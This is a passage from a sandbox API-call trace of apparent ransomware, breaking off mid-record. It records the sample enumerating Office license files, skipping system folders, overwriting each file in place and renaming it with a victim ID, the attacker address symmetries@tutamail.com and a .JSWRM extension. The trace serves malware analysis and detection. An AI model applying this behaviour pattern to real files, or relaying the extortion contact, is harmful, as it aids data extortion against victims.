lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdCO365R_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0111.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0111.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0111.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_Subscription-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0111.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_Subscription-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22ce70, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdCO365R_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0111.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0111.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0111.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0111.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0111.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subscription-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.863] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11199) returned 1 [0111.864] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0111.864] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0111.866] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.867] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0111.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.867] CloseHandle (hObject=0x45c) returned 1 [0111.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0111.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0111.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0111.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0111.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0111.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0111.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.867] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subscription-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_Subscription-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subscription-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0111.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0111.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0111.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.869] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed20b499, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed20b499, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xed31650e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x535b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdCO365R_Subscription-ppd.xrm-ms", cAlternateFileName="VIFDE0~1.XRM")) returned 1 [0111.869] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ppd.xrm-ms", lpString2=".") returned 1 [0111.869] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ppd.xrm-ms", lpString2="..") returned 1 [0111.869] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ppd.xrm-ms", lpString2="...") returned 1 [0111.869] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ppd.xrm-ms", lpString2="windows") returned -1 [0111.869] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.869] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.869] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.869] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.869] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.869] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0111.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_Subscription-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0111.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_Subscription-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdCO365R_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0111.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0111.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0111.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_Subscription-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0111.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_Subscription-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdCO365R_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0111.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0111.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0111.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0111.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0111.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subscription-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.870] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=21339) returned 1 [0111.870] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5350) returned 0x24c1d0 [0111.870] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5350, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5350, lpOverlapped=0x0) returned 1 [0111.873] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.873] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5350, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5350, lpOverlapped=0x0) returned 1 [0111.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.873] CloseHandle (hObject=0x45c) returned 1 [0111.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0111.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0111.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0111.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0111.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0111.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0111.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0111.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0111.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.874] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subscription-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_Subscription-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subscription-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0111.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0111.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0111.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.875] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec61f824, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec61f824, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec704647, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d7c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdCO365R_Subscription-ul-oob.xrm-ms", cAlternateFileName="VI164E~1.XRM")) returned 1 [0111.875] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.875] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.875] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.875] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.875] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.875] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.875] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.875] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.875] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.875] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0111.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_Subscription-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0111.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_Subscription-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d0a0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdCO365R_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0111.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0111.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0111.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_Subscription-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0111.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0111.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_Subscription-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d0d8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdCO365R_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0111.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0111.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0111.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0111.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0111.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subscription-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.876] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11644) returned 1 [0111.876] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0111.876] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0111.885] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.885] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0111.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.885] CloseHandle (hObject=0x45c) returned 1 [0111.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0111.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0111.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0111.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0111.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0111.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0111.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.885] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subscription-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_Subscription-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subscription-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0111.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0111.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0111.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0111.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.887] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec5f95b0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec5f95b0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec8a8030, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bab, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdCO365R_SubTest-pl.xrm-ms", cAlternateFileName="VISIOS~3.XRM")) returned 1 [0111.887] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-pl.xrm-ms", lpString2=".") returned 1 [0111.887] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-pl.xrm-ms", lpString2="..") returned 1 [0111.887] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-pl.xrm-ms", lpString2="...") returned 1 [0111.887] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-pl.xrm-ms", lpString2="windows") returned -1 [0111.887] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-pl.xrm-ms", lpString2="recovery") returned 1 [0111.887] lstrcmpiW (lpString1="VisioStdCO365R_SubTest-pl.xrm-ms", lpString2="perflogs") returned 1 [0111.887] 